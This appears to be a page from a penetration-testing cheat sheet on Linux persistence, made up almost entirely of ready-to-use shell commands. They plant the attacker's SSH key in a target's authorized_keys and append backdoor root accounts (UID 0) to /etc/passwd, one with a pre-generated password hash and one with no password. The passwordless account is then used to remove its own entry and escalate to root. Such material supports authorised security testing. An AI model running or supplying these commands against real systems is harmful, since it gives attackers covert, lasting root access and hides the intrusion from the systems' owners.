########################
Payload/Loot/Persistence
########################

*******************
SSH Key Persistence
*******************

| Prepare your public key

.. code-block:: bash

  # Retrieve your public key from private key
  PUB=$(ssh-keygen -i -f <(ssh-keygen -e -f ~/.ssh/id_rsa))

  # Generate command to type on target
  echo -e "echo '$PUB'>>~/.ssh/authorized_keys"

| Create ~/.ssh/authorized_keys if it doesn't exist on target

.. code-block:: bash

  mkdir ~/.ssh
  chmod 700 ~/.ssh
  touch ~/.ssh/authorized_keys
  chmod 600 ~/.ssh/authorized_keys

|

********
Add user
********

.. code-block:: bash

  echo -n '1337'|openssl passwd -stdin -6 
  $6$07PkbbZSjiAeltsw$TXFcCHd1VvOg/xOjZHJP6XafpG4MzjKmGQ3smnnIUv7mIgAdlX1eqSuOnU6WbBo8bnM9sWfXvi5kzAMoeaFAy.

  cat <<'EOF'>>/etc/passwd
  hacker:$6$07PkbbZSjiAeltsw$TXFcCHd1VvOg/xOjZHJP6XafpG4MzjKmGQ3smnnIUv7mIgAdlX1eqSuOnU6WbBo8bnM9sWfXvi5kzAMoeaFAy.:0:0:Hacker Account:/root:/bin/bash
  EOF

  # Remove 
  # sed -i '/hacker/d' /etc/passwd

|

| Or without password

.. code-block:: bash

  # Add user if passwd is writable
  cat <<'EOF'>>/etc/passwd
  hackerhackerhacker::0:0:root:/root:/bin/bash
  EOF
  su - hackerhackerhacker -c "sed -i '/hackerhackerhacker/d' /etc/passwd;id;su -"

|